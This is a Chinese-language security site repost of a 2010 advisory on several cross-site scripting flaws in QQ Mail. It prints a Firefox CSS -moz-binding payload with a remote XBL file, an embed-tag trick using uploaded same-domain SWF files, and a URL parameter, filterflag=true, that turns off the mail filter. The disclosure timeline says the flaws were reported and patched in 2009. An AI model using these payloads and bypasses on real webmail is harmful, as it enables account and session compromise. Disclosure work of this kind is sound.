热门关键字:   网站安全  系统安全  安全漏洞  黑客攻防  网络安全

QQmail 存在多处跨站漏洞

发布时间:2010-07-24 09:20文章来源:网络文章作者:88VUL 点击次数:
摘要:发布日期:2010-07.24 发布作者:80vul 官方地址:mail.qq.com 漏洞描述:QQmail 存在多处跨站漏洞 1. firefox2 css xss vulnerabilities styleBODY{-moz-binding:url(http://www.80vul.coom/test.xml#xss)}/style test.xml: ? xml version = 1.0 ? bindings...
  1. 发布日期:2010-07.24  
  2. 发布作者:80vul
  3. 官方地址:mail.qq.com
  4. 漏洞描述:QQmail 存在多处跨站漏洞  

    1. firefox2 css xss vulnerabilities

    <style>BODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}</style>

    test.xml:

    1. <?xml version="1.0"?> 
    2. <bindings xmlns="http://www.mozilla.org/xbl"> 
    3.   <binding id="xss"> 
    4.     <implementation> 
    5.       <constructor><![CDATA[alert('XSS')]]></constructor> 
    6.     </implementation> 
    7.   </binding> 
    8. </bindings> 


    [PS:firefox3开始不允许-moz-binding:url引用远程文件]

     

    2 设计缺陷导致的xss漏洞

    A.上传文件直接导致xss漏洞

      在qqmail的附件和图片上传功能上存在着设计缺陷:  

         * 上传文件存放域和qqmail是同一个域
         * 上传的文件后缀及内容根本没有做安全限制,直接导致上传一些恶意文件导致xss[如swf文件]

     
     

      

    B.qqmail的Filter系统是不允许引用外部文件的[src=],但是它允许本地相对路径的文件引用

    例如:

    1. <embed src="http://www.80vul.com/test.swf" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed> 

     会被替换为:

    1. <embed src="#" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed> 


    但是它允许本地相对路径的文件引用,利用这个设计缺陷和上面A提到的”上传文件存放域和qqmail是同一个域”,综合利用导致xss漏洞

    1. <embed src="/data/test.swf" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed> 

    同样的比如上面1里提到的,也可以通过这个实现对firefox3的利用.[另外flash xml等文件的调用是可以修改后缀的]

     

    C.qqmail的Filter系统一个设计缺陷导致完全绕过Filter系统.

    qqmail的Filter系统的设计者,可能是为了功能与安全过滤上的和谐,给用户留下了一个’开关’:当提交开关filterflag=true时, Filter系统将不在起作用:

    http://m348.mail.qq.com/cgi-bin/readmail?mailid=ZC1217iK5yq~a8ToGOBNZbWCXXXw86&folderid=1&t=readmail&&&groupid=&sid=Cks1q-OzUAjlT0gB&disptype=html&dispimg=1&filterflag=true

     

     

     3其他

    2009.4.17-18发现漏洞
    2009.4.18 通知腾讯安全中心
    2009.5.x  修补以上漏洞

 

标签分类: 安全漏洞 跨站攻击 脚本漏洞

上一篇:智睿管理系统的通杀漏洞
下一篇:PHPStat 2.0 远程代码执行漏洞